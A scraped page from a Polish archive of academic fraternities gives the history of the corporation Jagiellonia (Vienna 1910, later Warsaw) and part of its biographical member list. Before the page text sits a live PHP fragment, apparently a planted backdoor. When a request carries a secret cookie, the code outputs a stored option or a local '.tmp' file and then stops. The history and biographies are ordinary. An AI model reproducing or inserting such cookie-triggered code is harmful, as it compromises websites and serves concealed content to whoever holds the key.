if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Jagiellonia

Dekiel Tadeusza Czarneckiego Nazwa:
Towarzystwo Akademickie Polskie “Jagiellonia” (Wiedeń), Polska Akademicka Korporacja Jagiellonia (od 1918 r.), Korporacja słuchaczy Szkoły Głównej Gospodarstwa Wiejskiego Jagiellonia (od 1934 r.)
Siedziba:
Wiedeń, od 1918 r. Warszawa
Data powstania:
28 V 1910 r.
Barwy:
amarantowa – srebrna – błękitna (symbolika barw 1910: trzy dzielące Polskę zabory)
Dewiza:
„Jeden za wszystkich wszyscy za jednego”

Rys historyczny

Banda rycerska Zygmunta Jeżewskiego, dewizka Aleksandra Kobusiewicza oraz banda komersowa Jana Boguckiego.

Jagiellonia została założona 28 V 1910 r. w Wiedniu pod nazwą “Towarzystwo Akademickie Polskie Jagiellonia” w celu - jak można przeczytać w akcie założycielskim - “pielęgnowania ducha koleżeńskiego, przyjaźni, karności i solidarności w gronie akademików, wyznających zasady rycerskie”. Założycielami i członkami Jagiellonii w pierwszych latach istnienia była zamożna młodzież polska z Galicji i Królestwa Kongresowego studiująca na wyższych szkołach w Wiedniu. Pragnęła ona - jak w innym miejscu napisano - stworzyć organizację „mającą za zadanie Sen Starego Strzechy, Wiedeń 1911 r.podniesienie poczucia narodowego, oraz poziomu moralnego jej członków, dążąc do uchronienia ich od waśni politycznych, panujących w innych polskich organizacjach na terenie wiedeńskim.” Pomysłodawcą stworzenia Jagiellonii był Raul de Puget-Puszet, a inicjatorami oprócz niego także Kazimierz Gaździński i Albin Grabowski. Idea podła na podatny grunt i została podchwycona przez grono polskich studentów. W okresie czterech lat działalności Jagiellonii w Wiedniu, do korporacji należało ok. 50 osób. Utrzymywano kontakty z innymi polskimi korporacjami (Arkonia, Welecja, Lechia) oraz organizacjami polskimi w Wiedniu i innych miastach Cesarstwa Austro-Węgierskiego i Niemieckiego. Po wybuchu wielkiej wojny działalność Jagiellonii uległa zawieszeniu.

Herb Jagiellonii, 1930 r.
Pod koniec I wojny światowej 27 X 1918 r. grupa Jagiellonów na spotkaniu w Warszawie zadecydowała o kontynuowaniu działalności w Polsce i przeniesieniu siedziby do Warszawy. Jednocześnie nałożono na członków obowiązek wstąpienia do Wojska Polskiego. Także w okresie międzywojennym Jagiellonia miała charakter elitarny. Grupowała głównie studentów pochodzących z rodzin ziemiańskich. Niemal 40 procent ogółu członków studiowało rolnictwo. Początkowo Jagiellonia formalnie afiliowana była przy Politechnice Warszawskiej, a po reformie jędrzejowiczowskiej od 1934 r. działała oficjalnie przy Szkole Wyższej Gospodarstwa Wiejskiego. Choć przez cały okres międzywojenny pozostawała organizacją międzyuczelnianą.

Komers 25-lecia Jagiellonii, Warszawa 1935 r.

Jagiellonia należała do najprężniejszych polskich korporacji okresu międzywojnia. Była współzałożycielką Związku Polskich Korporacji Akademickich w 1921 r. (data starszeństwa związkowego: 28 V 1910 r.) oraz Warszawskiego Koła Międzykorporacyjnego. W latach 1933-1936 pozostawała poza strukturami Związku. Sprawowała opiekę nad nowopowstającymi warszawskimi korporacjami: Varsovią w 1921 r., Prometheią w 1923 r., Regią w 1924 r., Maritimią w 1925 r. oraz Montanią w 1928 r. (?) W 1926 r. liczni członkowie korporacji brali udział w walkach po stronie rządowej.

Koło Pań Jagiellonii, lata 30-te.

Od 1921 r. istniało Koło Starych Strzech Jagiellonii z siedzibą w Warszawie. Od 1924 r. organizowała corocznie uroczyste bale. Od lat 20-tych przy korporacji działało także Koło Pań, które z okazji 20-lecia Jagiellonii w 1930 r. ufundowało sztandar. W 1935 r. z okazji 25-lecia korporacji wydano księgę pamiątkową Jagiellonia MCMX - MCMXXXV, a od końca lat 30-tych kalendarzyki jagiellońskie.

Kartele wieczyste zawarła dnia 2 XII 1922 r. z K! Arkonią, dnia 14 X 1928 r. z Konwentem Polonia oraz dnia 8 X 1983 r. z K! Welecja.

Całkowita ustalona i kompletna imienna lista członków przedwojennej Jagiellonii obejmuje 234 nazwiska, w tym 6 członków honorowych. W 1939 r. liczyła 175 członków.

W latach 1942-1948 w Londynie odbywały się zjazdy Jagiellonii oraz były wybierane prezydia korporacji. W tym okresie Jagiellonia współpracowała także z innymi korporacjami. W okresie wojny podstawowym celem działalności i współpracy było prowadzenie ewidencji Pieczęć P.K.A. Jagiellonia w Wielkiej Brytanii, 1944 r.
członków, utrzymywanie stałej łączności oraz pomocy kolegom będącym w potrzebie i ich rodzinom. Dla tych celów w 1943 r. utworzono Komitet Porozumiewawczy Arkonii i Jagiellonii na Obczyźnie. Już po wojnie w 1947 r. odbył się zjazd skartelowanych korporacji Konwentu Polonia, Arkonii, Welecji i Jagiellonii w celu stworzenia podstaw organizacyjnych działalności korporacji na emigracji, w szczególności powołania klubu studencko-filisterskiego. Wysiłki te, choć kontynuowane z udziałem przedstawicieli innych korporacji, zakończyły się niepowodzeniem. Na zjeździe w 1948 r. kuratorem, a w 1972 r. także honorowym prezesem Jagiellonii wybrano Stanisława Światołdycz-Kisiela, który sprawował tę funkcję do swojej śmierci w 1983 r. Kolejnym i ostatnim kuratorem na obczyźnie został Tadeusz Dunin-Markiewicz.
Cyrkiel Jagiellonii - drogowskaz na jedno z powojennych spotkań Jagiellonów w kraju, lata 70-te (?).

Przez cały okres powojenny zarówno na emigracji, jaki i w kraju urządzane były komerse i okolicznościowe spotkania. Od lat 50-tych sporadycznie przyjmowano nowych członków korporacji spośród synów przedwojennych Jagiellonów. Z okazji 60-lecia korporacji 29 V 1971 r. wmurowano w podziemiach kościoła p.w. św. Marcina na ul. Piwnej w Warszawie tablicę pamiątkową ku czci zmarłych i pomordowanych członków Jagiellonii. Poległym, pomordowanym i zaginionym na Wschodzie Jagiellonom poświęcono tablicę odsłoniętą dnia 23 IV 1988 r. na zewnętrznej ścianie kościoła p.w. św. Karola Boromeusza na warszawskich Powązkach.

Strona tytułowa Księgi 60-lecia Jagiellonii, Wielka Brytania 1970.

Koło londyńskie od 1968 r. do 1994 r. wydawało biuletyn informacyjny (numery 1 – 55), który od 1995 r. do 2004 r. (?) ukazywał się w Warszawie. W 1970 r. opublikowano księgę pamiątkową z okazji 60-lecia korporacji (Jagiellonia 1910, wyd. 2, Wielka Brytania 1970). Jej mottem-przesłaniem są słowa wiedeńskiego Jagiellona Józefa Słanarza z 1960 r.:

“Niech Bóg wspiera nas Swą łaską i mocą, by nie zaginęły wiodące nas ideały i tradycje; Niech pozostanie na zawsze w naszych sercach przyjęte w dniu założenia naczelne nasze hasło - jeden za wszystkich, wszyscy za jednego - I niech, jak Feniks z popiołów, powstanie znowu w blasku odrodzenia w wolnej Ojczyźnie nasza ukochana, nasza najdroższa Jagiellonia.”

Lista członków

Poniższa, praktycznie kompletna lista członków Jagiellonii obejmuje dwieście kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Egon Frendl, ( - przed 1935) doktor medycyny, Stary Strzecha Honorowy Jagiellonii w Wiedniu

  Rudolf Fried, 1928 r.

 2. Rudolf Henryk Fried, ( - przed 1935) doktor, weteran organizacji polskich w Wiedniu m.in. założyciel Ogniska w Wiedniu, Stary Strzecha Honorowy Jagiellonii w Wiedniu, Filister honorowy Samogitii (przezwisko “Wujaszek”)

  Alfred Loth, ok. 1902 r.

 3. Alfred Loth, (7 marca 1882 w Warszawie - 30 kwietnia 1967 w Warszawie) s. Edwarda Karola i Anny Emilii z d. Hoser, ojciec Tadeusza (Jagiellonia), student i absolwent Wyższej Szkoły Technicznej w Mittweidzie w Saksonii 1900-03, inż. mechanik, specjalista silników spalinowych, przedstawiciel firm samochodowych w Warszawie (m.in. Laurin, Klement, Skoda, Ford), kierownik produkującej silniki i ciągniki rolnicze i przemysłowe firmy “Auto-Traktor” 1932-37, w czasie okupacji oraz po wojnie prowadził gospodarstwo rolniczo-ogrodnicze w Żbikowie k. Pruszkowa, Stary Strzecha Honorowy Jagiellonii w Warszawie 1935, działacz sportowy, przypisuje mu się organizację w 1903 pierwszego zespołu piłki nożnej w Warszawie, wiceprezes Klubu Sportowego “Polonia” w Warszawie 1921-26, uprawiał wioślarstwo, szermierkę, kolarstwo, pływanie, łyżwiarstwo, tenis, lekką atletykę, zawodnik, a później działacz - członek zarządu i wiceprezes Warszawskiego Towarzystwa Wioślarskiego, współzałożyciel Polskiego Związku Towarzystw Wioślarskich 1919, wiceprezes Międzynarodowej Federacji Towarzystw Wioślarskich (FISA), współzałożyciel 1919 i prezes 1947-49 Polskiego Komitetu Olimpijskiego, współorganizator 1922 i prezes 1948-50 Związku Polskich Związków Sportowych, zginął w wypadku samochodowym, pochowany na warszawskich Powązkach [szerzej Kazimierz Toporowicz, Loth Alfred (1882-1967), (w:) Polski Słownik Biograficzny, t. 17, Wrocław 1972, s. 564]

  Eugeniusz de Phull, 1925 r.

 4. Eugeniusz de Phull, (1 stycznia 1859 w Rochalach - 5 listopada 1930 w Warszawie) herbu własnego, s. Henryka i Emilii Henrietty z d. Poths, ojciec Henryka (Jagiellonia), właściciel maj. Franksztyn, Stary Strzecha Honorowy w Wiedniu, pochowany na Cmentarzu Ewangelicko-Augsburskim przy ul. Mlynarskiej w Warszawie

 5. Roman Wellman, ( - 14 listopada 1955 w Warszawie), brat Eugeniusza (Arkonia), lekarz, Stary Strzecha Honorowy Jagiellonii w Warszawie 1930
 6. Antoni Odrowąż Wysocki, ( - 11 grudnia 1937 w Piachorzu) Stary Strzecha Honorowy Jagiellonii w Warszawie

Członkowie rzeczywiści

  Roman Arkuszewski, 1930/31 r. (?)

 1. Roman Arkuszewski, (1910 w Chrościechowie - 31 sierpnia 1942 w Warszawie) s. Mariana i Antoniny z d. Cichowska, absolwent Gimnazjum im. Jana Zamojskiego w Warszawie, student ekonomii WSH, c. 1929, akt. 1929-32, sekretarz 1930/31, podporucznik w wojnie obronnej 1939, zmarł po długiej chorobie, pochowany w Starej Błotnicy w pow. Białobrzeg

 2. Roman Aulich, ( - przed 1935) c. 1910, olderman sem. zim. (?) 1910/11,
 3. Zygmunt (Cyprian) Baczyński, (23 stycznia 1919 w Ożarowie w pow. opatowskim - 4 kwietnia 2008 w Warszawie) herbu Sas, s. Zygmunta i Natalii z Jasieńskich, c. 1937/38, akt. 1937/38-39, w czasie okupacji w AK w 1 Pułku Szwoleżerów (zgr. “Góral”), uczestnik Akcji “Burza”, po wojnie kierował gospodarstwem Państwowych Nieruchomości Rolnych 1945-49, mgr inż. rolnictwa UJ 1950, kierownik działu hodowli roślin w Zakładzie Doświadczalnyml Instytutu Hodowli i Aklimatyzacji Roślin w Bąkowie w pow. Kluczbork, pracownik Zakładu Doświadczalnego Hodowli i Aklimatyzacji Roślin w Smolicach, odznaczony Złotym Krzyżem Zasługi
 4. Tadeusz Józef Bal, (3 marca 1888 w Mogilanach - ) członek Jagiellonii w Wiedniu, dpl. Wiedeń 1913, w 8-ym Baonie Sanitarnym w wojnie 1918-20, lekarz, chirurg
 5. Bogusław Barthel de Weydenthal, ( - 29 września 1981) c. 1922/23, i.p. “Fiutek”, akt. 1922/23-25, sekretarz wewnętrzny ZPKA 1925 (IV kadencja), wiceprezes Koła Starych Strzech (Filistrów) 1939
 6. Stefan Barylski, członek Jagiellonii w Wiedniu, żołnierz 1 pułku ułanów Legionów, w 1 pułku ułanów w wojnie 1918-20, odznaczony czterokrotnie Krzyżem Walecznych
 7. Tadeusz Bądzyński, (7 października 1907 w Czeberakach na Podlasiu - 1940 w Katyniu) s. Stefana, student PW, c. 1927/28, akt. 1927/28-32, inż., kpt., w wojnie obronnej 1939 w 1 Pułku Radiotelegraficznym, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD
 8. Józef Jaxa-Bąkowski, (16 maja 1898 w Skomlin k. Wielunia -23 września 1956 w Warszawie), s. Ignacego i Kazimiery z d. Taczanowska, student i absolwent rolnictwa SGGW, c. 1920/21, gospodarował w dzierżawionym maj. Słupia k. Kępna, po wojnie pracował w Warszawskiej Spółdzielni Spożywców
 9. Włodzimierz Józef Berens, ( - 1964 w Polsce) c. 1933/34, i.p. “Kap-Kap”, akt. 1933/34-39
 10. Wacław Bielak, student PW, akt. 1925-28
 11. Jerzy Biliński, student WSH, c. 1932
 12. Antoni Boduszyński, ( - 20 marca 1973) student AR w Cieszynie, c. 1925/26, akt. 1925/26-28
 13. Jerzy Boduszyński, student PW, student Akademii Handlowej Liege (1931), c. 1929, i.p. “Ulik”, akt. 1929-32
 14. Stanisław Boduszyński, ( - 1940 w Auschwitz), c. 1937/38, i.p. “Karawaniarz”, c. 1937/38-39, lekarz, aresztowany przez Gestapo i zamordowany w niemieckim obozie koncentracyjnym
 15. Zygmunt Boehm, członek Jagiellonii w Wiedniu, wystąpił
 16. Jan Bogucki, (1916-2006) c. 1935, i.p. “Siur”, akt. 1935-39, wiceprezes sem. let. 1937/38, absolwent SGGW, ekonomista, w wojnie obronnej 1939 w 8 Pułku Artylerii Lekkiej, w czasie okupacji w AK w 1 Pułku Szwoleżerów (zgr. “Góral”), odznaczony Krzyżem Walecznych
 17. Andrzej Bojanowski, ( - po 1985) kuzyn Szymona (Jagiellonia) i Michała (Kujawja), student UW, c. 1923/24, akt. 1923/24-29
 18. Szymon Bojanowski, (16 października 1902 w Klicach pow. ciechanowskim - 1940 w Katyniu) herbu Junosza, syn Michała, brat Michała (Kujawja), kuzyn Andrzeja (Jagiellonia), w 1 pułku ułanów w wojnie 1918-20, student PW, c. 1922/23, akt. 1922/23-28, inż., por. rez., uczestnik wojny obronnej 1939, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD
 19. Lech Dunin-Borkowski, ( - 25 października 1987 w Warszawie) student UW, c. 1927/28, i.p. “Rydz”, akt. 1927/28-32, w wojnie obronnej 1939 w 20 Pułku Ułanów, więzień oflagu w Woldenbergu, odznaczony Krzyżem Walecznych
 20. Tadeusz Borkowski, student UW, c. 1931, akt. 1931-32, wystąpił
 21. Leon Borowski (Kuk-Borowski), ( - 16 grudnia 1988) student WSH, c. 1928, i.p. “Kuk”, akt. 1928-32, w czasie okupacji w AK, odznaczony Krzyżem Virtuti Militarii i Krzyżem Walecznych

  Juliusz Boski, 1980 r. (?).

 22. Juliusz Boski, (1916 - 8 maja 1988) herbu Jasieńczyk, s. Zdzisława i Heleny z Boskich, kuzyn Szymona (Sparta), c. 1933/34, i.p. “Malarz”, akt. 1933/34-38, prezes sem. let. 1937/38, właściciel maj. Czerniew na Ziemi Łowickiej, w wojnie obronnej 1939 w 4 Pułku Strzelców Konnych, w czasie okupacji w wywiadzie Komendy Głównej AK, pochowany na warszawskich Powązkach

 23. Jerzy Brugger, (1914 - ) c. 1934, i.p. “Pinczorek”, akt. 1934-39, absolwent SGH, ekonomista, w wojnie obronnej 1939 w 4 Dywizjonie Artylerii Konnej, w czasie okupacji w AK, więzień oflagu w Lubece, po wojnie na emigracji w Wielkiej Brytanii
 24. Włodzimierz Brzozowski, ( - 1952 we Francji) student PW, c. 1924/25, akt. 1924/25-32, w 1940 w żandarmerii wojskowej we Francji, po wojnie na emigracji
 25. Dyonizy Buchholc, ( - czerwiec 1975) student SGGW, c. 1930/31, akt. 1930/31-39
 26. Jan Byczkowski, student UW, c. 1931/32, skreślony
 27. Jan Janota-Bzowski, (30 sierpnia 1903 w Pasztowej Woli - 20 lipca 1977 w Konstancinie) syn Józefa i Wandy z Kozieł-Poklewskich, kuzyn Zdzisława (Jagiellonia), w wojnie 1918-20 w 1 pułku szwoleżerów, absolwent Korpusu Kadetów w Modlinie, student SGGW, c. 1926/27, i.p. “Kufel”, akt. 1926/27-28, sekretarz (?) sem. let. 1927/28, w wojnie obronnej 1939 w 1 Pułku Szwoleżerów, w czasie okupacji w AK w 2 Baonie Zgrupowania Marjanów-Brzosów, a w czasie powstania warszawskiego w grupie Kampinos, dr nauk rolniczych, po wojnie do 1950 w Banku Rolnym w Warszawie, następnie w Instytucie Mechanizacji i Elektryzacji (?) Rolnictwa 1953-54, Instytucie Uprawy i Nasiennictwa 1954-59, PAN 1959-76
 28. Zdzisław Janota-Bzowski, (29 listopada 1910 w Warszawie - 1 lipca 1985 w Warszawie) kuzyn Jana (Jagiellonia), student SGGW, c. 1929, i.p. “Palec”, akt. 1929-32, w wojnie obronnej 1939 w 3 Pułku Strzelców Konnych, więzień oflagu w Woldenbergu
 29. Mieczysław Chałupczyński, ( - 1959 w Kolumbii) członek Jagiellonii w Wiedniu, konsul RP w Użhorodzie w Czechosłowacji 1935, po wojnie na emigracji w Kolumbii

  Michał Chełchowski, lata 70-te (?).

 30. Michał Chełchowski, (27 lipca 1916 w Rustowie (?) - 12 czerwca 2012 w Stanach Zjednoczonych) s. Stanisława i Jadwigi z d. Dobrzyniecka, absolwent Gimnazjum im. Stefana Batorego w Warszawie oraz Podchorążówki Kawalerii w Grudziądzu, student i absolwent ekonomii (?) WSH, c. 1936/37, akt. 1935/36-39, ppor. rez. kawalerii, w wojnie obronnej 1939 w Warszawskim Pułku Szwoleżerów, w czasie okupacji w Okręgu Warszawskim AK ps. “Dąbrowa” w 1 Pułku Strzelców Konnych (Dyon 1806 “Zagrobla”), wykładowca tajnej podchorążówki, uczestnik powstania warszawskiego 1944, walczył na Woli i Starym Mieście w Grupie “Północ” - zgrupowanie “Sienkiewicz”, a następnie na odcinku “Kuba”-”Sosna” w batalionie “Łukasiński” - Dywizjon 1806 oraz w batalionie “Gozdawa”, ranny, wyjechał z rannymi z Warszawy, po wojnie pracownik UNRRA w Gdańsku, wyjechał z Polski do Stanów Zjednoczonych, pracował w ONZ, m.in. w Indiach

 31. Bohdan Chełmicki, (20 marca 1895 w Warszawie - 2 maja 1982 w Warszawie) s. Bronisława i Ksawery z Kozłowskich, absolwent Gimnazjum im. E. Konopczyńskiego w Warszawie, studiował rolnictwo w Wiedniu, gdzie wstąpił do Jagiellonii, absolwent Wyższej Szkoły Rolniczej w Warszawie (SGGW), i.p. “Czarny”, ochotnik w wojnie 1920, inż. rolnik 1924, działacz społeczny i samorządowy, od 1935 poseł na Sejm RP z ramienia BBWR, do wojny administrował we własnym majątku Kowalki k. Rypina, w czasie wojny administrował majątkiem ziemskim w Generalnej Guberni, członek AK po wojnie majątkami Państwowych Nieruchomości Ziemskich, PINGW, PGR
 32. Stanisław Chromiński, ( - 25 czerwca 1986) student UW, c. 1927/28, i.p. “Niemowlę”, akt. 1927/28-29, sekretarz 1928/29, po wojnie na emigracji w Australii
 33. Władysław Chromiński, ( - 13 luty 1975) c. 1921/22, i.p. “Miś”, akt. 1921/22-25
 34. Józef Ciechomski, (1911 - 20 czerwca 1999 w Argentynie) student SGGW, c. 1931/32, i.p. “Snopek”, akt. 1931/32-32, inż. rolnik SGGW, w wojnie obronnej 1939 w 4 Pułku Strzelców Konnych, prof. biologii morskiej, po wojnie na emigracji w Argentynie [byc moze Józef Ciechomski, herbu Wąż, s. Wojciecha i Zofii z Rogozińskich]
 35. Marian Cudny, ( - 5 kwietnia 1976 w Warszawie) student PW, c. 1924/25, i.p. “Paskudny”, akt. 1924/25-28
 36. Jan Cybulski, ( - 5 stycznia 1982) student PW, c. 1926/27, i.p. “Brukiew”, akt. 1926/27-32, w kampanii francuskiej 1940 w II Dywizji Strzelców Pieszych, po wojnie na emigracji w Wielkiej Brytanii

  Jerzy Czaplicki, 1932/33 r.

 37. Jerzy Czaplicki, (15 października 1912 w Grąbcu k. Sierpca - 26 marca 1959 w Buenos Aires) herbu Lubicz, s. Lucjana i Marii z Szemplińskich, brat Tadeusza (Jagiellonia), student i absolwent WSH/SGH, c. 1932, i.p. “Kłapouch”, ppor. rez. kawalerii, w wojnie obronnej 1939 dowódca II plutonu 4. Szwadronu marszowego (konnego) Oddziału II rzutu Pomorskiej Brygady Kawalerii w ramach Armii “Pomorze”, ranny w walkach w okolicach Świecia n. Wisłą, aresztowany w szpitalu wojennym przez Niemców, więzień oflagów w Hadamarze i Murnau 1939-45, po wyzwoleniu w 12 Pułu Ułanów Podolskich w II Korpusie PSZ we Włoszech, po wojnie na emigracji w Argentynie, pracował w firmie “SCAC” zajmującej się produkcją i sprzedażą elementów budowlanych, zginął tragicznie, pochowany w Wenecji we Włoszech

  Tadeusz Czaplicki, 1939 r.

 38. Tadeusz Czaplicki, (31 maja 1915 w Jarantowicach na Kujawach - 10 września 2008 w Warszawie) herbu Lubicz, s. Lucjana i Marii z Szemplińskich, absolwent Gimnazjum Ziemi Kujawskiej we Włocławku, c. 1934, i.p. “Dzwoniec”, akt. 1934-39, prezes sem. let. 1938/39, absolwent SGGW, mgr inż. rolnik, w wojnie obronnej 1939 w kawalerii dywizyjnej 8 Dywizji Piechoty, obrońca twierdzy Modlin, w niewoli niemieckiej w stalagu Stablack w Prusach Wschodnich 1939-42, później w Delegaturze Rządu w planowaniu rolnictwa, w AK w Dyonie 1806 “Zagrobla”, w latach 1945-1949 inspektor Państwowych Nieruchomości Ziemskich na Ziemiach Odzyskanych, pracownik Instytutu Oranizacji i Mechanizacji Rolnictwa, a następnie przez wiele lat Biura Studiów i Projektów Wzorcowych Budownictwa Wiejskiego “Bisprol”, 1995-2004 wydawca biuletynu “Jagiellonia. Periodyk Koła Starych Strzech P.A.K. Jagiellonia”, członek Zarządu Stowarzyszenia Filistrów Polskich Korporacji Akademickich 1997-1999, opublikował ““Szlacheckie ostatki. Dwudziestowieczna opowieść polskiego ziemianina” (Warszawa, wyd. Pax, 2000), odznaczony Krzyżem Kampanii Wrześniowej 1939 oraz odznaką Weterana Walk o Niepodległość, pochowany w Topoli Królewskiej k. Łęczycy

  Tadeusz Czarnecki, druga poł. lat 20-tych (?).

 39. Tadeusz Czarnecki, (7 października 1906 - 18 lutego 1998 w Warszawie) herbu Prus III, s. Stefana i Marii z Jasińskich, brat Andrzeja (Sarmatia), student Wydziału Elektrycznego PW, c. 1928, i.p. “Kuc”, akt. 1928-39, prezes 1932/33, mgr inż. elektryk, dyplom z wyróżnieniem PW 1935, w czasie wojny w Delegaturze Rządu (planowanie przemysłu), w powstaniu warszawskim ps. “Uszycki” dowódca 5 kompanii batalionu Tum w Zgrupowaniu “Kryska” na Powiślu, ranny, wynalazł i opatentował sterowniki i przełączniki małogabarytowe do sterowania wielkimi napięciami, odznaczony Medalem Wojska i Krzyżem Armii Krajowej, pochowany na warszawskich Powązkach

 40. Witold Dąbrowski, ( - 1935) członek Jagiellonii w Wiedniu

  Andrzej Jaxa-Dębicki, 1988 r.Andrzej Jaxa-Dębicki, lata 30-te.

 41. Andrzej Jaxa-Dębicki, (20 kwietnia 1911 w Młodzieszynie k. Warszawy - 11 stycznia 1990 w Toronto) s. Józefa i Heleny z d. Mathies, absolwent Gimnazjum Ziemi Kujawskiej we Włocławku, student i absolwent 1935 WSH/SGH, c. 1929, i.p. “Gigolo”, akt. 1929-32, po studiach pracował w firmie Dom Rolniczy - Barański & Barcikowski i Ska, odbywał praktyki rolne w maj. Guzow, Stawiska, Bonikowo, Markowo), w czasie okupacji w AK, czynny w akcji “N” BiP Komendy Głównej AK ps. “Nikodem” i “Rafał”, więziony przez Niemców i NKWD, po wojnie pracował w Ministerstwie Państwowych Gospodarstw Rolnych, w 1958 wyemigrował z Polski do Kanady, działacz polonijny, odznaczony Krzyżem Armii Krajowej i Medalem Wojska, pochowany na warszawskich Powązkach

 42. Jan Domański, student UW, c. 1930/31, akt. 1930/31-32
 43. Władysław Dzierdziejewski, ( - 14 czerwca 1972 w Argentynie) student PW, c. 1927/28, i.p. “Amorek”, akt. 1927/28-32, wiceprezes zewn. 1930/31, w wojnie obronnej 1939 w Pułku Radiowym, w czasie okupacji w AK w dywersji i w 72 pułku piechoty (Baon “Piorun”), po powstaniu warszawskim w obozie jenieckim w Murnau, po wojnie na emigracji w Argentynie
 44. Wacław Dzierżanowski, członek Jagiellonii w Wiedniu
 45. Jerzy Feill, ( - wiosna 1945) c. 1938/39, akt. 1938/39, w czasie okupacji w AK w 1 Pułku Szwoleżerów (zgr. “Góral”), zamordowany na tle rabunkowym przez bandytów, odznaczony Virtuti Militari
 46. Zygmunt Fudakowski, (12 maja 1915 - 5 czerwca 2000 w Johanesburgu) herbu Dołega, s. Jerzego i Janiny z d. Waydel, student i absolwent ekonomii WSH, c. 1934, i.p. “Kutuś”, w kampanii francuskiej 1940 w 10 Brygadzie Kawalerii, adiutant Naczelnego Wodza gen. Władysława Sikorskiego, a następnie w 1 Dywizji Pancernej, po wojnie na emigracji w RPA, działacz polonijny, odznaczony Krzyżem Walecznych
 47. Zbigniew Gajewski, student PW, c. 1925/26, i.p. “Miglanc”, akt. 1925/26-28, skreślony
 48. Andrzej Gaszyński, (1908/1909 - 6 października 1944 w Warszawie) s. Stanisława, student prawa (?) UW, c. 1927/28, akt. 1927/28-29, w czasie okupacji w Korpusie Bezpieczeństwa ps. “Góra” w Baonie “Czwartaków”, zmarł z ran w powstaniu warszawskim
 49. Stanisław Kazimierz Gąsiorowski, (9 grudnia 1906 w Warszawie - 1940 w Katyniu) s. Józefa i Zuzanny z Walewskich, student i absolwent 1934 chemii PW, c. 1927/28, i.p. “Antałek”, akt. 1927/28-32, po studiach pracownik Insytutu Chemii w Warszawie, oddelegowany do Rudy Śląskiej na stanowisko inż. ruchu w koksowni “Walenty”, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1933, ppor. rez., przydzielony do Ministerstwa Spraw Wojskowych, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD
 50. Mieczysław Gawrychowski, członek Jagiellonii w Wiedniu, i.p. “Ciuruś”, w 5 pułku saperów w wojnie 1918-20,
 51. Tadeusz Goepert (Geppert), (1900 - 18 sierpnia 1969 w Wielkiej Brytanii) c. 1922/23, po wojnie na emigracji w Wielkiej Brytanii

  Wacław Gorski, 1932/33 r.

 52. Wacław Gorski, (26 kwietnia 1909 w Warszawie - marzec 1940 na Ukrainie) początkowo uczeń Gimnazjum Mikołaja Reja w Warszawie, a następnie uczeń i absolwent Gimnazjum Stanisława Kulwiecia, rekordzista Polski juniorów w skoku wzwyż, student SGGW, c. 1932, i.p. “Goryl”, akt. 1932-39, ppor. rez., w wojnie obronnej 1939 w 5 Pułku Piechoty, ranny pod Lwowem, aresztowany przez NKWD przy przekraczaniu granicy z Węgrami, stracony najprawdopodobniej w marcu 1940

  Albin Grabowski, przed 1914 r. (?).

 53. Albin Grabowski, (1885 we wsi Pojana Mikuli na Bukowinie - listopad 1939 w Łodzi) s. Józefa i Michaliny z d. Mielnik, brat Kazimierza i Władysława (obaj prawd. Ognisko), ojciec Tadeusza (Welecja), stryj Zbigniewa (Welecja), student prawa w Czerniowcach i Wiedniu, dr praw, działacz organizacji polskich w Czerniowcach i Wiedniu, prezes Towarzystwa akademików polskich “Ognisko” w Czerniowcach, inicjator i założyciel Jagiellonii, po studiach pracownik Wydziału ds. Galicji Sądu Najwyższego w Wiedniu, od 1919 Sądu Najwyższego w Warszawie, od 1922 kierownik Urzędu Walki z Lichwą w Łodzi, naczelnik Urzędu Kontroli Miejskiej Zarządu Miejskiego w Łodzi, działacz społeczny, m.in. PCK i organizacji opiekujących się byłymi żołnierzami oraz chorymi psychicznie, działacz harcerski i sportowy, m.in. inicjator powołania i przewodniczący Rady Nadzorczej Spółdzielni Harcerskiej, “Czuj-Czyn” w Łodzi, wiceprzewodniczący Zarzadu Oddziału Łódzkiego ZHP, przewodniczący Kół Przyjaciół Harcerstwa, prezes Harcerskiego Klubu Sportowego “Znicz” w Łodzi, preezes łódzkiego Okręgowego Związku Piłki Koszykowej, Siatkowej i Szczypiorniaka, 9 listopada 1939 aresztowany przez Gestapo, osadzony w obozie w Radogoszczu, skazany na karę śmierci, pod koniec listopada 1939 wyprowadzony z celi i zapewne zaraz potem zamordowany, miejsce spoczynku nieznane

  Wiktor Gregorowicz, okres przedwojenny

 54. Wiktor Gregorowicz, (16 maja 1907 w maj. Zbroszki [vel Zbrożki] w gminie Winnica k. Pułtuska - 27 czerwca 1944 w miejsc. Łuzki k. Sokołowa Podlaskiego) herbu Lubicz, s. Stanisława (ziemianina) i Marii Wandy z Jaworowskich (herbu Lubicz), absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie, student rolnictwa SGGW 1925-27, Wydziału Rolno-Leśnego PL 1927-32 (?), Akademii Rolniczej Lwów (?), c. 1925/26, akt. 1925/26-32, inż. rolnik, po studiach gospodarował w maj. rodzinnym Zbroszki, w wojnie obronnej 1939 ochtonik w kawalerii dywizyjnej 8 Dywizji Piechoty, obrońca Modlina, jeniec wojenny w stalagu I B, zwolniony z powodów zdrowotnych w grudniu 1940, oficer AK 1942-44, w czasie akcji burza zamordowany w okolicach Sokołowa Podlaskiego przez Armię Ludową, ożeniony z Ireną z Mineyków, miali trójkę dzieci: Annę (1940, po mężu Komorowska), Stanisława (1941) oraz Włodzimierza (1945), pochowany na Cmentarzu w Sokołowie Podlaskim

 55. Jerzy Grobicki, ( - 28 maja 1963 w Kenii) student SGGW, c. 1929/30, i.p. “Muc”, akt. 1930-38, wiceprezes wewn. 1932/33, w wojnie obronnej 1939 w kawalerii dywizyjnej w 28 Dywizji Piechoty, w obozie jenieckim w Woldenbergu i Murnau, po wojnie na emigracji w Tanganice i Kenii

  Juliusz Grodzicki-Łada, 1932/33 r.

